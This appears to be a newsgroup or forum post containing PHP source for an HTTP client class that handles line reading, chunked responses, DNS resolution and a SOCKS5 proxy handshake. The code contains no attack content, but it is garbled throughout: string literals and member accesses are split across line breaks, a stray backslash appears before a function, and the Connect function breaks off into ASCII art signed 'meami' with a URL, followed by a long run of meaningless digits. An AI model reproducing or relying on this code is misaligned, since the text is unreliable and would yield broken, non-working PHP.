Function SetDataAccessError($error,$check_connection=0)
{
$this->error=$error;
if(!$this->use_curl
&& function_exists("socket_get_status"))
{
$status=socket_get_status($this->connection);
if($status["timed_out"])
$this->error.=": data access time out";
elseif($status["eof"])
{
if($check_connection)
$this->error="";
else
$this->error.=": the server disconnected";
}
}
}

Function OutputDebug($message)
{
$message.="\n";
if($this->html_debug)
$message=str_replace("\n","<br />\n",HtmlEntities($message));
echo $message;
flush();
}
Function GetLine()
{
for($line="";;)
{
if($this->use_curl)
{
$eol=strpos($this->response,"\n",$this->read_response);
$data=($eol ? substr($this->response,$this->read_response,$eol
+1-$this->read_response) : "");
$this->read_response+=strlen($data);
}
else
{
if(feof($this->connection))
{
$this->SetDataAccessError("reached the end of data while
reading from the HTTP server connection");
return(0);
}
$data=fgets($this->connection,100);
}
if(GetType($data)!="string"
|| strlen($data)==0)
{
$this->SetDataAccessError("it was not possible to read line
from the HTTP server");
return(0);
}
$line.=$data;
$length=strlen($line);
if($length
&& !strcmp(substr($line,$length-1,1),"\n"))
{
$length-=(($length>=2 && !strcmp(substr($line,
$length-2,1),"\r")) ? 2 : 1);
$line=substr($line,0,$length);
if($this->debug)
$this->OutputDebug("S $line");
return($line);
}
}
}
Function PutLine($line)
{
if($this->debug)
$this->OutputDebug("C $line");
if(!fputs($this->connection,$line."\r\n"))
{
$this->SetDataAccessError("it was not possible to send a line to
the HTTP server");
return(0);
}
return(1);
}
Function PutData(&$data)
{
if(strlen($data))
{
if($this->debug)
$this->OutputDebug("C $data");
if(!fputs($this->connection,$data))
{
$this->SetDataAccessError("it was not possible to send data to
the HTTP server");
return(0);
}
}
return(1);
}
Function FlushData()
{
if(!fflush($this->connection))
{
$this->SetDataAccessError("it was not possible to send data to
the HTTP server");
return(0);
}
return(1);
}
Function ReadChunkSize()
{
if($this->remaining_chunk==0)
{
$debug=$this->debug;
if(!$this->debug_response_body)
$this->debug=0;
$line=$this->GetLine();
$this->debug=$debug;
if(GetType($line)!="string")
return($this->SetError("4 could not read chunk start: ".$this-
>error));
$this->remaining_chunk=hexdec($line);
}
return("");
}
Function ReadBytes($length)
{
if($this->use_curl)
{
$bytes=substr($this->response,$this->read_response,min
($length,strlen($this->response)-$this->read_response));
$this->read_response+=strlen($bytes);
if($this->debug
&& $this->debug_response_body
&& strlen($bytes))
$this->OutputDebug("S ".$bytes);
}
else
{
if($this->chunked)
{
for($bytes="",$remaining=$length;$remaining;)
{
if(strlen($this->ReadChunkSize()))
return("");
if($this->remaining_chunk==0)
{
$this->last_chunk_read=1;
break;
}
$ask=min($this->remaining_chunk,$remaining);
$chunk=@fread($this->connection,$ask);
$read=strlen($chunk);
if($read==0)
{
$this->SetDataAccessError("it was not possible to read data
chunk from the HTTP server");
return("");
}
if($this->debug
&& $this->debug_response_body)
$this->OutputDebug("S ".$chunk);
$bytes.=$chunk;
$this->remaining_chunk-=$read;
$remaining-=$read;
if($this->remaining_chunk==0)
{
if(feof($this->connection))
return($this->SetError("reached the end of data while
reading the end of data chunk mark from the HTTP server"));
$data=@fread($this->connection,2);
if(strcmp($data,"\r\n"))
{
$this->SetDataAccessError("it was not possible to read
end of data chunk from the HTTP server");
return("");
}
}
}
}
else
{
$bytes=@fread($this->connection,$length);
if(strlen($bytes))
{
if($this->debug
&& $this->debug_response_body)
$this->OutputDebug("S ".$bytes);
}
else
$this->SetDataAccessError("it was not possible to read data
from the HTTP server", $this->connection_close);
}
}
return($bytes);
}
\ Function EndOfInput()
{
if($this->use_curl)
return($this->read_response>=strlen($this->response));
if($this->chunked)
return($this->last_chunk_read);
return(feof($this->connection));
}
Function Resolve($domain, &$ip, $server_type)
{
if(ereg('^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$',
$domain))
$ip=$domain;
else
{
if($this->debug)
$this->OutputDebug('Resolving '.$server_type.' server domain "'.
$domain.'"...');
if(!strcmp($ip=@gethostbyname($domain),$domain))
$ip="";
}
if(strlen($ip)==0
|| (strlen($this->exclude_address)
&& !strcmp(@gethostbyname($this->exclude_address),$ip)))
return($this->SetError("could not resolve the host domain \"".
$domain."\""));
return('');
}
Function Connect($host_name, $host_port, $ssl, $server_type = 'HTTP')
{
$domain=$host_name;
$port = $host_port;
if(strlen($error = $this->Resolve($domain, $ip, $server_type)))
return($error);
if(strlen($this->socks_host_name))
{
$host_ip = $ip;
$port = $this->socks_host_port;
$host_server_type = $server_type;
$server_type = 'SOCKS';
if(strlen($error = $this->Resolve($this->socks_host_name, $ip,
$server_type)))
return($error);
}
if($this->debug)
$this->OutputDebug('Connecting to '.$server_type.' server IP '.
$ip.' port '.$port.'...');
if($ssl)
$ip="ssl://".$ip;
if(($this->connection=($this->timeout ? @fsockopen($ip, $port,
$errno, $error, $this->timeout) : @fsockopen($ip, $port, $errno)))==0)
{
switch($errno)
{
case -3:
return($this->SetError("-3 socket could not be created"));
case -4:
return($this->SetError("-4 dns lookup on hostname \"".
$host_name."\" failed"));
case -5:
return($this->SetError("-5 connection refused or timed
out"));
case -6:
return($this->SetError("-6 fdopen() call failed"));
case -7:
return($this->SetError("-7 setvbuf() call failed"));
default:
return($this->SetPHPError($errno." could not connect to the
host \"".$host_name."\"",$php_errormsg));
}
}
else
{
if($this->data_timeout
&& function_exists("socket_set_timeout"))
socket_set_timeout($this->connection,$this->data_timeout,0);
if(strlen($this->socks_host_name))
{
if($this->debug)
{
$this->OutputDebug('Connected to the SOCKS server '.$this-
>socks_host_name);
$this->OutputDebug('Negotiating the authentication
method ...');
}
$send_error = 'it was not possible to send data to the SOCKS
server';
$receive_error = 'it was not possible to receive data from the
SOCKS server';
$version = 5;
$methods = 1;
$method = 0;
if(!fputs($this->connection, chr($version).chr($methods).chr
($method)))
$error = $this->SetDataAccessError($send_error);
else
{
$response = fgets($this->connection, 3);
if(strlen($response) != 2)
$error = $this->SetDataAccessError($receive_error);
elseif(Ord($response[1]) != $method)
$error = 'the SOCKS server requires an authentication
method that is not yet supported';
else
{
if($this->debug)
$this->OutputDebug('Connecting to '.$host_server_type.'
server IP '.$host_ip.' port '.$host_port.'...');
$command = 1;
$address_type = 1;
if(!fputs($this->connection, chr($version).chr
($command)."\x00".chr($address_type).pack('Nn', ip2long($host_ip),
$host_port)))
$error = $this->SetDataAccessError($send_error);
else
{
$response = fgets($this->connection, 11);
if(strlen($response) != 10)
$error = $this->SetDataAccessError($receive_error);
else
{
$socks_errors = array(
"\x00"=>'',
"\x01"=>'general SOCKS server failure',
"\x02"=>'connection not allowed by ruleset',
"\x03"=>'Network unreachable',
"\x04"=>'Host unreachable',
"\x05"=>'Connection refused',
"\x06"=>'TTL expired',
"\x07"=>'Command not supported',
"\x08"=>'Address type not supported'
);
$error_code = $response[1];
$error = (IsSet($socks_errors[$error_code]) ?
$socks_errors[$error_code] : 'unknown');
if(strlen($error))
$error = 'SOCKS error: '.$error;
}
}
}
}
if(strlen($error))
{
fclose($this->connection); \\\\\\\\////////
return($error); \\ m e a m i//
} \\________//
} \\______//
if($this->debug) [m][m][m]
$this->OutputDebug("Connected to $host_name"); /\/\
if(strlen($this->proxy_host_name)HTTP://MEAMI.ORG -WWW.//\\
&&
s28360052796347811088734197636451643055151479529688054684069274257897004720850858
26145452462631429540732852782816160263430911490872894001502426047070390961878042
05054318561716151220662317166668718757101508808649746965125304112418261524281273
03960530927905816565924917186528218714394921110766440713262029719408803207124665
42342136482385949512481270053930281232769798075700908201337341935583822292462527
88647564899109974936502395771607346428618304603175555599107481508933295885443472
05096222768030775849825542729689476839012213167032851629154589026644665464538815
81986963830865813052226426724552464725431061310829855738886141637201668621081437
18477262370549772977827623810679084635829913290310521666916754117621260277242014
82684043946027207446633498220929409746833561409027708400270004452976824403473708
28639806760157956120204837322218360100159069085641350184543880661353666249879726
17145217073750499894121701741688576920788844943379472595291594050070276888913147
69546623221072784724083301160149384027233606952179074358885551245313144677437661
79824650626204001549281235248638211738314872927426303409137837262613583698085046
76779300361990978586055050893978728388987879499444003227699065497769734977285013
20501884982220952063632400628094650269008406839334202274797942413607377913340941
36213664547245653641044397844244125881497430514677750112651540416167936
[517433]

0 new messages